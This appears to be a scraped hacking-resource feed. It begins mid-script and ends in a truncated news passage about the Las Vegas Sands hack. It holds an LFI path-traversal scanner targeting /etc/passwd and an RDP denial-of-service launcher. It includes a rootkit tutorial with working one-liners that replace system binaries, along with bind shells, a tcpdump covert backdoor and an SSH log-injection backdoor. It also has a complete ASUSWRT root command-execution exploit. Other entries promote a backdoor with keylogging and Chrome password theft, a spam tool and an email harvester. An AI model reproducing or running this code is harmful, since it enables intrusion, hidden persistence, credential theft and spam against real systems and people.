Mobile/11D167 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'] if RANDOMAGENT: UA = random.choice(userAgent) headers = { 'User-Agent' : UA } else: UA = "Python-urllib/%s.%s" % sys.version_info[:2] headers = { 'User-Agent' : UA } return headers # File check list + regexp CHECK = dict() CHECK['etc/passwd'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$' CHECK['etc/group'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$' CHECK['etc/hosts'] = '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}{0,5}:[\da-fA-F]{1,4}{0,5}[\da-fA-F]{1,4})' RANDOMAGENT = options.randomagent TIMEOUT = options.timeout URL = options.url PORT = options.port TARGET = options.target if URL[0:8] == "https://": PROTO = URL[0:8] URL = URL[8:] if URL.endswith("/"): URL = URL.replace("/","") if PORT == 0: PORT = 443 elif URL[0:7] == "http://": PROTO = URL[0:7] URL = URL[7:] if URL.endswith("/"): URL = URL.replace("/","") if PORT == 0: PORT = 80 else: PROTO = "http://" URL = options.url if URL.endswith("/"): URL = URL.replace("/","") if PORT == 0: PORT = 80 try: #URL = socket.gethostbyname( URL ) socket.gethostbyname( URL ) except socket.gaierror: #could not resolve print 'Hostname could not be resolved. Exiting' sys.exit() headers = randomAgentGen() print(banner) print print('[*] URL:\t'+PROTO+URL) print('[*] TARGET:\t'+TARGET) print('[*] PORT:\t'+str(PORT)) print found = 0 for fileCheck, fileRegexp in CHECK.items(): FILE = fileCheck REGEXP = fileRegexp checkValidRegexp = re.compile(REGEXP, re.IGNORECASE) for scanLFI in range(1, 11): PATHTRAV = "../" PATHTRAV = PATHTRAV * scanLFI try: req = urllib2.Request(PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE, None, headers) connection = urllib2.urlopen(req, None, TIMEOUT) response = connection.readlines() getcode = connection.getcode() sentinel = 0 for checkResponse in response: #if (getcode == 200 and response != ""): if (getcode == 200 and checkValidRegexp.match(checkResponse)): sentinel = sentinel + 1 if sentinel > 1: print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE+'\t <--- FOUND') found = found + 1 else: print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE) # HTTP error - 4xx, 5xx except urllib2.HTTPError: print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE) # Connection error - Connection refused, No route to host except urllib2.URLError: print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT)) sys.exit() if found < 1: print print('[+] Nothing found') Source

KingSpam Author: Doddy Hackman A simple Perl script to spam emails and IRC channels. You have the following options: [+] Spamming channel or a normally always [+] Spamming an entire server [+] Spamming a list of servers and all its channels [+] Able to choose a nick to the bot and timeout [+] Allows spamming email accounts A video with examples of use : Download: https://github.com/DoddyHackman/KingSpam.git https://github.com/DoddyHackman/KingSpam/archive/master.zip Source

Penetration Testing with the Bash shell Make the most of the Bash shell and Kali Linux's command-line-based security assessment tools Author: Keith Makan Download: https://www.scribd.com/doc/252492167/Penetration-Testing-with-the-Bash-shell

Pro Mailer: PHP - Inbox - Attach files - Smtp - SSL Download http://pastebin.com/HnMUgbnt

[!] Author - Muhammad Adeel aka Stoker [!] Mail - jutthaxor@gmail.com [!] Greetz - Team Xploiters [!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <=''' #!/usr/bin/python# jutthaxor@gmail.com import os,sys,re,subprocess print ''' +-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+ |R|d|p| |A|u|t|o|E|x|p|l|o|i|t| |B|y| |S|t|o|k|e|r| +-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+ [!] Author - Muhammad Adeel aka Stoker [!] Mail - jutthaxor@gmail.com [!] Greetz - Team Xploiters [!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <=''' if os.getuid() != 0: print '\n\t\t[unSufficient Priviliges]Error:You are Not Root!\n' sys.exit(1) def help(): if len(sys.argv) != 2: print """ [!]Usage - ./script.py [Target Host] [!]Example - ./script.py 127.0.0.1\n""" sys.exit(1) help() RHOST = sys.argv[1] nmap = subprocess.Popen('nmap -p3389 %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait() nmapresul = open('/tmp/nmap.txt', 'rU') found = nmapresul.read() vulnerability = re.search(r'3389[/]tcp\sopen', found) if not found: print "\n[!] Port 3389 is Close." sys.exit(1) print '\n[!] Port Is Open. Let me try AutoRdp Exploit' metasploit = subprocess.Popen('msfcli auxiliary/dos/windows/rdp/ms12_020_maxchannelids RHOST=%s RPORT=3389 E' %RHOST, shell=True).wait() subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait() end = raw_input('Hit Enter to Exit.') Source

Basic operation of rootkit Shell script version of rootkit C version of rootkit Using the rootkit to hide stuff File hiding below the proc filesystem Netcat remote shell Using tcpdump as a covert communication path SCTP remote shell Hidden shell on /dev/tty9 Covert communication path with sshd and /var/log/auth.log Basic operation of rootkit This blogpost shows how to install a simple rootkit with one single (but relatively long) line on a terminal. While the rootkit is not as capable and hard to detect as a full kernel rootkit, it is still able to hide itself, other files, running processes and even open TCP/UDP ports from the system administrator. We have used variations of this rootkit in the hacking contest for several years and it has never been detected and removed in phase 2. The rootkit works by replacing the commands ls, netstat, ps, lsof and find with a simple wrapper, which calls the original command with all arguments and pipes the output to “grep -vE ‘regex_of_stuff_to_hide’” to filter out lines of the output. There are two variations of the rootkit. The first one uses a simple shell script for the wrapper while the second one compiles a small c program instead (which makes the rootkit harder to detect and analyze in the limited time of the hacking contest). Shell script version of rootkit The shell script version is still useful if the system doesn’t contain a c compiler: which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|177\"";chmod 493,$o' The which command lists the absolute path of the programs to maniuplate in the rootkit. These absolute paths are passed to a perl one-liner. The perl program starts with defining the variables $s and $n, which are initialized with the Unicode characters u+455 and u+578. These characters look like the ascii characters “s” and “n”. Then it copies the filename of the original filename to $o and changes the filename in $_ by replacing the “s” in ls, netstat, ps and lsof with u+455 and the “n” in find with u+578. The result of these replacements is a new filename which looks exactly like the original filename. The original program is then renamed to the new name and then replaced with a shell script, which calls the renamed original program ($_) and pipes the output to grep. The grep command filters lines containing one of the following: Unicode characters used by the rootkit ([$s-$n]) => Makes the rootkit self-hiding The string “grep” => Don’t show that grep is running in the output of ps The string “177? => This is used for the stuff which should be hidden by the rootkit. This rootkit is pretty easy to detect and analyze because it can easily be seen with the file command that programs like ps or ls have changed the type from an ELF binary to a shell script. After discovering the rootkit, it is also pretty easy to analyze the functionality of it and then selectively find the backdoors hidden by the rootkit. C version of rootkit In order to make finding and analyzing the rootkit more difficult, it is also possible to compile small binaries instead of the shell script: which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**{char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"177|\$\$|[$s-$n]|grep\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}' The beginning is pretty much like the first variant of the rootkit. However, insted of directly writing the wrapper program, the perl script opens a pipe to gcc and writes a small C program to this pipe. The following shows a more readable version of the C program: int main(int a,char**{ char*c[999999]={"sh","-c","original_program \$*|grep -vE \\"177|\$\$|[$s-$n]|grep\\""}; memcpy(c+3,b,8*a); execv("/bin/sh",c); } The first line initializes the argument array for execv with “sh -c” and the same shell command as the first variant of the rootkit while the second line copies all remaining arguments from the argv array passed to the wrapper binary to the end of the argument array for execv. Using the rootkit to hide stuff The following section shows some of the stuff which can be hidden by the rootkit. In order to hide a process using the rootkit, it must match the regular expression of the grep command. This can easily be achieved by making the process name contain the string “177?. For hiding open ports from netstat/lsof, the port number has to contain “177?. File hiding below the proc filesystem Another interesting dilemma when hiding backdoors is whether you want to leave the backdoor binary in the filesystem or not. If you keep the binaries in the filesystem, the backdoor can be found and detected there. On the other hand, it is relatively uncommon to have open file descriptors to deleted files on a typical desktop Linux system and so a defender can easily spot processes with open file handles to deleted files using e.g. the following command: ls -l /proc/*/fd|grep deleted In order to come around this limitation, we have found a clever new way of hiding files from the system administrator without deleting the files: Unmounting the /proc directory, place the files in /proc on the root filesystem and remount the proc filesystem. Since there may be processes accessing the proc filesystem while we try to unmount it, we use the -l option of umount for lazy unmounting: umount -l /proc Now we can create a few files there for our backdoors: cd /proc cp /usr/bin/perl 177a cp /usr/sbin/tcpdump 177b cp /bin/nc.tr* 177c cp `which socat` 177d mknod 177e c 4 9 # This is a copy of /dev/tty9 ln /var/log/auth.log 177f Netcat remote shell The first backdoor is a simple netcat listener with a shell attached (177c is a copy of nc.traditional): ./177c -l -p 3177 -e /bin/sh & If there is no compatible netcat available, we can use socat (177d) or perl (177a) instead: ./177d TCP4-Listen:3177,fork EXEC:/bin/sh & And if socat is missing as well, we can still use perl: ./177a -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}'& Due to the rootkit these processes and the open port can’t be seen with standard system tools like ps or netstat. Using tcpdump as a covert communication path Another backdoor can be built based on tcpdump (which has been copied to 177b): ./177b -iany -n -A udp 2>&1|./177a -ne'system($1)if/LEGO(.*)/'& This command makes tcpdump listen for udp packets on any interfaces and due to the -A option it outputs the raw packet data to STDOUT, which is then piped to a small perl one-liner, which checks for a marker (the string “LEGO”) and passes everything from there to system(). This backdoor is particularly interesting because it provides remote root access without any open ports (which might still be detected e.g. with a port scan). SCTP remote shell The followinig backdoor uses socat (copied to 177d) to open a backdoor via SCTP. ./177d SCTP-Listen:1177,fork EXEC:/bin/bash& Since SCTP is not listed with netstat, it is less likely to be detected than a standard backdoor via TCP/UDP. Hidden shell on /dev/tty9 The following uses perl (177a) to open a shell to /dev/tty9 (177e), which can be accessed via [CTRL]+[ALT]+[F9]. ./177a -pe'system$_'<177e>177e& Opening a shell on tty devices like this is an old trick and well-prepared teams usually check for that kind of backdoors by switching over all virtual terminals and looking for a shell prompt (due to the perl one-liner instead of a real shell there is no visible shell prompt with our exploit) or by running a command like “lsof -n /dev/tty*” (which won’t detect our version of the backdoor since we recreated the device with mknod). Covert communication path with sshd and /var/log/auth.log The following perl (177a) one-liner continiously monitors 177f (which is a hard link to /var/log/auth.log) for a magic string (“LEGO”) and parses the following characters as hex-encoded string, which is then decoded and passed to system. ./177a -e'while(1){sleep(1);while(<>){system pack("H*",$1)if/LEGO(\w+)/}}'<177f& This can be exploited by trying to log in with a specially crafted username via ssh. The ssh server writes an error message to /var/log/auth.log and since the error message contains the username, this can be used to remotely inject arbitrary code to the system: # Hex-encode our shell command: perl -e 'print "LEGO".unpack("H*","id > /tmp/auth.owned")."\n"' LEGO6964203e202f746d702f617574682e6f776e6564 # Use the resulting string as a username for an ssh login to get the command executed: ssh LEGO6964203e202f746d702f617574682e6f776e6564@target_ip After installing the backdoor programs to /proc, we can remount the proc filesystem to hide the files from the administrator: mount -t proc proc /proc Since the files still exist hidden below the proc filesystem, they are not listed as deleted files in /proc/pid/fd. Source

Description # A service called "infosvr" listens on port 9999 on the LAN bridge. # Normally this service is used for device discovery using the # "ASUS Wireless Router Device Discovery Utility", but this service contains a # feature that allows an unauthenticated user on the LAN to execute commands # <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr. # "iboxcom.h" is in asuswrt/release/src/router/shared. # # Affected devices may also include wireless repeaters and other networking # products, especially the ones which have "Device Discovery" in their features # list. # # Using broadcast address as the IP address should work and execute the command # on all devices in the network segment, but only receiving one response is #!/usr/bin/env python3 # Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution # Date: 2014-10-11 # Vendor Homepage: http://www.asus.com/ # Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip # Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip # Tested Version: 3.0.0.4.376_1071-g8696125 # Tested Device: RT-N66U # Description: # A service called "infosvr" listens on port 9999 on the LAN bridge. # Normally this service is used for device discovery using the # "ASUS Wireless Router Device Discovery Utility", but this service contains a # feature that allows an unauthenticated user on the LAN to execute commands # <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr. # "iboxcom.h" is in asuswrt/release/src/router/shared. # # Affected devices may also include wireless repeaters and other networking # products, especially the ones which have "Device Discovery" in their features # list. # # Using broadcast address as the IP address should work and execute the command # on all devices in the network segment, but only receiving one response is # supported by this script. import sys, os, socket, struct PORT = 9999 if len(sys.argv) < 3: print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr) sys.exit(1) ip = sys.argv[1] cmd = sys.argv[2] enccmd = cmd.encode() if len(enccmd) > 237: # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server. print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr) sys.exit(1) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('0.0.0.0', PORT)) sock.settimeout(2) # Request consists of following things # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO # PacketType [byte] ; NET_PACKET_TYPE_CMD # OpCode [word] ; NET_CMD_ID_MANU_CMD # Info [dword] ; Comment: "Or Transaction ID" # MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp # Password [byte[32]] ; Not checked at all # Length [word] # Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00') sock.sendto(packet, (ip, PORT)) # Response consists of following things # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO # PacketType [byte] ; NET_PACKET_TYPE_RES # OpCode [word] ; NET_CMD_ID_MANU_CMD # Info [dword] ; Equal to Info of request # MacAddress [byte[6]] ; Filled in for us # Length [word] # Result [byte[420]] ; Actually returns that amount while True: data, addr = sock.recvfrom(512) if len(data) == 512 and data[1] == 22: break length = struct.unpack('<H', data[14:16])[0] s = slice(16, 16+length) sys.stdout.buffer.write(data) sock.close() # milw00rm.com [2015-01-04] Source

DESCRIPTION Esearchy is a small library capable of searching the internet for email addresses. Currently, the supported search methods are, but not limited to: Search engines: Google Bing Yahoo, AltaVista Social Engines: LinkedIn Google Profiles ( Based on DigiNinja's idea gpscan - DigiNinja) Naymz Classmantes Spoke Other Engines PGP servers Usenets GoogleGroups Search Spider LDAP But Searches do not stop there, ESearchy it also looks for emails inside: PDF DOC DOCX XLSX PPTX ODT ODP ODS ODB ASN TXT Once all the text is parsed within the file the emails are added to the list of found accounts. In order to parse Microsoft Word (.doc): You Either need a windows Platform with Word installed. Install AntiWord. ( Antiword: a free MS Word document reader ) Or if non of the above is on the OS, we perform a raw search inside the file. NOTE: THIS IS STILL BEING DEVELOPED CODE IS SUBMITTED DAILY SO BE AWARE THAT CODE MIGHT NOT WORK PROPERLY AL THE TIME. IF SOMETHING GOES WRONG PLEASE RAISE AN ISSUE. SUPPORT: github.com/FreedomCoder/esearchy/issues Emails from github. SYNOPSIS: For now, there are two main ways of performing a search: Executable CLI command esearchy -h Library For thouse who want to integrate this to their application you can use it in “the ruby way” REQUIREMENTS: ruby 1.8 or 1.9 cgi pdf/reader json spidr ldap rubyzip ( Migrating to FreedomCoder-rubyzip 0.9.2 so it's 1.9 compatible) INSTALL: > sudo gem sources -a gems.github.com (If you do not have the repository) > sudo gem install gemcutter > sudo gem install esearchy Download https://github.com/carnal0wnage/esearchy-ng.git Source

cryptdoor AES encrypted python backdoor that communicates only AES encrypted traffic. Shell has the ability to spawn a meterpreter reverse_tcp into memory using VirtualAlloc (taken from Veil-Evasion). We can also download and upload files over the secure AES encrypted connection. Keylogging is implemented for windows using pyHook. All traffic apart from traffic meterpreter makes are encrypted with AES. On top of this all of the imports are randomized, and the script is encrypted with AES and decrypts itself in memory at runtime (taken from pyherion). Staged payload The main body of backdoor code is hosted at a url and download at runtime by the backdoor.py stub. This means that the actual backdoor code only exists in the victim memory. The backdoor payload can be hosted on tempsend.com or at a custom url and downloaded and exec'ed at runtime by the backdoor.py script. The code will be hidden in a jpg that remains valid so it can be viewed. The key for decrypting the payload code is kept in the downloader, so if anyone finds it online, they will not be able to decrypt it. Usage usage: ./cryptdoor.py [options] optional arguments: -h, --help show this help message and exit -i HOSTNAME, --hostname HOSTNAME Ip or hostname to connect back to. -p PORT, --port PORT Port to connect back to. -e EXPIRE, --expire EXPIRE Payload Life: h=hour, d=day, w=week, m=month -u CUSTOMURL, --customurl CUSTOMURL Host the generated jpg at this url. -f CUSTOMIMAGE, --customimage CUSTOMIMAGE Backdoor this jpg instead of a random choice from stubs/images. -a, --persistence Enable Auto-persistence. -b BACKDOORNAME, --backdoorname BACKDOORNAME Name of backdoor (default backdoor.py). -s SERVERNAME, --servername SERVERNAME Name of server (default server.py). cryptdoor.py will make the backdoor and server. The most simple syntax is: ./cryptdoor.py -i host -p port -e d You can add a -a to attempt automatic persistence: ./cryptdoor.py -i host -p port -e d -a Use your own jpg as the backdoor: ./cryptdoor.py -i host -p port -e d -f lol.jpg Host the produced jpg at a custom url instead of uploading to tempsend: ./cryptdoor.py -i host -p port -u http://myddns.us.to/cat.jpg host and port refer to the host and port of the listening server (attacker). These are the options you have from within the shell: AES-shell options: download file - Download a file from remote pwd to localhost. upload filepath - Upload a filepath to remote pwd. run commands - Run a command in the background. wget url - Download a file from url to remote pwd. tempsend file - Upload a file from remote pwd to tempsend.com Windows Only: persistence - Install exe as a system service backdoor. unpersist - Remove persistence and exit. meterpreter ip:port - Execute a reverse_tcp meterpreter to ip:port. keyscan - Start recording keystrokes. keydump - Dump recorded keystrokes. keyclear - Clear the keystroke buffer. chromepass - Retrieve chrome stored passwords. bypassuac cmds - Run commands as admin. proxyupdate file - Update proxy list from file. Compilation The backdoor script can be compiled to a standalone PE executable using pyinstaller on windows. Install python27: https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi Run this script to install pip: https://bootstrap.pypa.io/get-pip.py Press Windows Key+Pause, then "Advanced system settings" then "Environment Variables" You might or not have a "PATH" variable listed there if not add one and write "C:\Python27;C:\Python27\Scripts" If you do already have one just add a colon before adding this to the variable like: "C:\oldpath;C:\Python27;C\Python27\Scripts" Open a new cmd terminal and you should be able to: pip install pyinstaller pycrypto requests Add ';C:\Python27\Lib\site-packages\PyInstaller' to the end of your PATH variable Install pyHook: Download pyHook from SourceForge.net Install pywin32: Python for Windows Extensions - Browse /pywin32 at SourceForge.net Place the socks.py file in the same directory as backdoor.py if you want to use a proxy. Open a new cmd terminal and cd to wherever backdoor.py is. pyinstaller -F -w backdoor.py That's it, enjoy your exe in dist. Advanced Compilation You can compile the exe with optimized python files with: python -O C:\Python27\Scripts\pyinstaller-script.py -F -w backdoor.py If you want to upx pack the final exe to decrease final size include tools/upx.exe in the same directory as backdoor.py when you compile with pyinstaller. Proxies NOTE: Proxying is temporarily disabled. Will be back soon. If you wish to have your backdoor connect back to you through a HTTP/s proxy, there a few things we have to do: Edit the stubs/backdoor.py script from line 310-311, and fill in the values for the proxy details. Get a DDNS pointed at your IP (proxying will not work without one). Then generate your backdoor with the -x switch and replace the IP with your DDNS hostname: ./cryptdoor.py -i DDNS -p port -x HTTP proxying is acheived using: https://github.com/Anorov/PySocks Obfuscation Obfuscation of the backdoor source code is acheived using: https://github.com/astrand/pyobfuscate Download https://github.com/d4rkcat/cryptdoor.git Source

Black Hat Python, Python Programming for Hackers & Pentesters (Dec 2014) ''Python is the language of choice for hackers and security analysts for creating powerful and effective tools. Ever wonder how they do it? A follow-up to the perennial best-seller Gray Hat Python, Justin Seitz's Black Hat Python explores the darker side of Python's capabilities—writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, extending the popular web hacking tool Burp Suite, and more. You'll learn how to: Create a trojan command-and-control using Github. Detect sandboxing and automate common malware tasks, like keylogging and screenshots. Escalate Windows privileges with creative process control. Use offensive memory forensics tricks to retrieve password hashes and inject shellcode into a virtual machine. Abuse Windows COM automation to perform a man-in-the-browser attack. Exfiltrate data from a network most sneakily Insider techniques and creative challenges show you how to extend the hacks, and are sure to make Black Hat Python irresistible to anyone interested in offensive security.'' Download: https://www.sendspace.com/file/tggtkv Source

New tools released 2014. Whatsfree https://github.com/commonexploits/whatsfree Useful for when conducting pentests. Quickly find a live IP address to use. This can be handy when the client says “just pick one that is free” or when they give you a spreadsheet with an IP address to use and you want to ensure it is really free. Quite often typos will occur and you could take out a live box if you set the wrong IP. You do not need to set any IP address on your interface, just run it and it will list what IPs are free in the local subnet you enter. Livehosts https://github.com/commonexploits/livehosts This is a cut down version of LazyMap script I released. It will scan the given local or remote subnet and discover and count which hosts are live. Works very quickly just using some NMAP switches, lists and counts them. Handy for input into Nessus and also to work out how populated the VLANs are. During a pentest typically you will be given a spreadsheet with a list of VLANs and expected number of hosts. I always run this and then make a note of how many hosts were actually there. for example you expect to see 4 hosts and you see 40, this could impact the schedule so is worth alerting people at an early stage. Sonijohn https://github.com/commonexploits/sonijohn Something I created on the spot during a review on some Sonicwall firewalls. I wanted to check the password strength for the users. Sonicwall firewall configs export in a base64 file. This script you just point at the exported config file, it will decode it and extract all usernames and password hashes. It then changes them around in a way that makes them compatible with John the Ripper password cracker. So just then run John at them and it will work. Junijohn https://github.com/commonexploits/junijohn Much like the Sonicwall scipt, this is the same thing for Juniper Firewalls. DTPscan https://github.com/commonexploits/dtpscan This is a PASSIVE VLAN hopping script. I have updated and fixed this as a recent change to the way tshark outputs a summary broke this script. This will sniff a network port (no IP address needed) and look for DTP packets. If it finds DTP it will work out what mode it is in and tell you and indicate if it thinks VLAN hopping will be possible. Then you could run something like Frogger to carry out an ACTIVE attack to hop VLANS. A lot of clients now want to know “can you VLAN hop” this will tell you within 90 seconds if you can or not. WinocPHC (Windows Offline Password Hash Checker) https://github.com/commonexploits/winocphc Simply point at any extract password hashes from Windows operating systems that have been extracted with tools such as FGDump, pwdump, gsecdump etc. It will look through and highlight any user accounts that have the same password set and list the users. Also checks and separates disabled or previously used passwords. This is useful if you have extract domain hashes and find that half the users have the same password, this is likely to indicate an issue in the user creation process where the user is not being forced to change the password at first login. Also is good to highly password history issues, if the user can keep setting the same password it will list that too. LazyMap https://github.com/commonexploits/port-scan-automation Useful for any kind of internal infrastructure testing/VA. This will discover the live hosts, then port scan with NMAP just the live hosts. It then will list out all the unique open ports and then create you a Nessus policy. Then you just import the Nessus policy (which contains just the open ports found) and paste in the live hosts. This will be a much faster and accurate test as it is only scanning the live hosts and open ports. Also records start/stop times etc. Outputs all findings into client folders and auto excludes your own IP address. How many people Nessus the complete range where your tester laptops are and do not exclude? IPGen https://github.com/commonexploits/port-scan-automation A very simple script to generate IP address lists. Just give it a range and any IP addresses to exclude (see above, you want to exclude yourself and any other testers) and it will spit out a list of IP addresses. Then just paste these into Nessus etc. wEAPe https://github.com/commonexploits/weape A wireless network tool for testing managed wireless networks using 802.1x (PEAP/LEAP etc). It will assiocate against the AP and wait and extract any hostnames or domain usernames from the traffic as they authenticate to the wireless network. You do not need the wireless key/cert to do this. Frogger https://github.com/commonexploits/vlan-hopping An ACTIVE VLAN hopping tool. This will abuse the DTP protocol and imitate a trunk port. It will then extract any VLAN information from the switch and allow you to hop onto the other VLANs. Av0id https://github.com/nccgroup/metasploitavevasion handy little script to create Metasploit payloads to shell boxes running various Anti-Virus programs. Unfortunately these has been submitted to online scanners such as VirusTotal which share info with A.V vendors, therefore it doesn’t work too good now and gets flagged! EasyDA https://github.com/nccgroup/easyda A great tool for any Windows based infrastructure test. Insert a Windows password hash or clear text password and range of IPs. It will look for common password reuse within the network. It will also track down and look for where the Domain Administrator account is logged in. If common passwords exist and you find where the DA is, its game over. You are the domain admin, just impersonate the token and job done. Cisc0wn https://github.com/nccgroup/cisco-SNMP-enumeration Cisco SNMP enumeration, brute force, config downloader and password cracking script. Automate SNMP community checking, information extraction and configuration downloads from Cisco devices. Source

Sony Pictures Entertainment hack that started at the end of the last month and so far has caused a severe damage to its reputation as well as resources, from internal system shutdown to upcoming movies and scripts leak. Now, a similar cyber attack against Casino operator Las Vegas Sands Corp has been revealed that occurred on February 2014. The cyber attack occurred on this year’s February but the details of damages to the casino was not publicized until Bloomberg Businessweek exposed it in a story on Thursday. Hackers crippled thousands of servers and computers across the network of the giant Las Vegas Sands Corp. by wiping them with highly destructive malware. The hack attack was believed to be in response to the statement given by the chief executive officer and largest shareholder of Las Vegas Sands Corp., Sheldon Adelson. On October 2013, the billionaire made a statement at the Manhattan campus of Yeshiva University that Iran should be bombed to get the country to abandon its own nuclear program. This statement given by Adelson circulated on all over the Internet and reached Iran’s Supreme Leader Ayatollah Ali Khameeni, who responded after two weeks later and said that the American government should "slap these prating people in the mouth and crush their mouths". Two months later, the attackers attacked the Las Vegas Sands’ IT network to destroy the corporation and continues their attacks last January on the company’s virtual private network gateway at its slots casino in Bethlehem, Pennsylvania. The attack went worse in February, when hackers breached server for the casino’s website and used an open tool to fetch usernames and passwords. Finally, they found the credentials of a senior systems engineer who had visited the Bethlehem site from Las Vegas, which gave them keys to the corporate castle. The attackers wiped out data on computers and servers and erased hard drives, as malware ripped through the company’s networks. Hackers posted personal information about Sands Bethlehem employees, stolen email addresses and social security numbers. They also left personal messages for Adelson, "Encouraging the use of Weapons of Mass Destruction, UNDER ANY CONDITION, is a Crime, signed, the Anti WMD Team," said one. "Damn A, Don’t let your tongue cut your throat," warned another. The virus was written in a Visual basic language, which is a common desktop programming language. Visual basic malwares were used in past because of a limitation that it runs 